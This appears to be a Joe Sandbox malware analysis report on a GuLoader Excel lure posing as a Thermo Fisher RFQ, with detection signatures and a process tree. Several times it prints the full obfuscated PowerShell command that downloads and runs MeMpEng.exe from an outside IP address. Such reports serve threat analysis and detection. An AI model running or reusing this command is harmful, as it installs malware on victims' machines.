Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Thermo Fisher RFQ_TFS-1805.xls

Overview

General Information

Sample name:Thermo Fisher RFQ_TFS-1805.xls
Analysis ID:1500266
MD5:0afb5bfb1d8d7668a5cce238da947f98
SHA1:c0c607e334c4b31e3cc8d5703ec16faa9b4766d4
SHA256:98ad896fba17899465c642cc1e0e745ff5a081f5871fc091c0391a5929192ca5
Tags:xls
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3756 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3856 cmdline: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3880 cmdline: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3984 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • MeMpEng.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\MeMpEng.exe" MD5: A80E27FBED396BE3D87FE48DA3C4F266)
    • mshta.exe (PID: 3148 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2740 cmdline: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3068 cmdline: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2860 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2892 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • MeMpEng.exe (PID: 2432 cmdline: "C:\Users\user\AppData\Roaming\MeMpEng.exe" MD5: A80E27FBED396BE3D87FE48DA3C4F266)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000B.00000002.836188866.000000000492A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    System Summary

    barindex
    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ideanetowroking[1].hta
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3756, ProcessName: mshta.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3880, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", ProcessId: 3984, ProcessName: csc.exe
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3880, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exe
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3880, TargetFilename: C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", CommandLine: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; 